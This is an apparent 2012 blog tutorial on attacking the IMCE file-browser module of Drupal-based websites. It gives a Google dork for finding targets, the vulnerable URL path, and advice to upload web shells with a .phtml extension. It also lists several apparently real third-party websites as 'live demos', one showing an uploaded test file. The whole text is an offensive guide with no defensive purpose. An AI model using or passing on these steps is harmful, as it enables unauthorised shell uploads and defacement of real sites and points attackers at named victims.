Durpal IMCE Mkdir remote deface upload exploit

Google Dork : inurl:”/imce?dir=” intitle:”File Browser”
exploit :          http://website.com/imce?dir=
Shell Access : http://website.com/files/yourfilehere
                      http://www.website.com/abc/files/abc/yourfilehere

how+to+hack+durpal+shell+uploading+tutorial.gif (200×231) 

IMCE Mkdir is a remote file upload vulnerablity on durpal platform,
normaly you can upload .txt extentions on websites
but some sites allowes you to upload .html files
if you want to upload shell on website then try in .phtml extention

1st of all find a vulnerable website using google dork
after opening site goto http://website.com/imce?dir=
and file upload option there

to acess your shell/deface/file go here
http://www.website.com/abc/files/abc/yourfilehere 

(replace abc with directory of website)
Leave comment if any query 🙂 stay connected for More !
Live demo :  http://labourlakesandfurness.co.uk/imce?dir=
Result: http://labourlakesandfurness.co.uk/sites/labourlakesandfurness.co.uk/files/test.html
Other demos 
http://correaporto.com.br/english/imce?dir=.
http://www.somaly.org/imce?dir=
http://1daygraphics.com/imce?dir=client

Read more: Durpal IMCE Mkdir remote deface upload exploit

Story added 5. July 2012, content source with full text you can find at link above.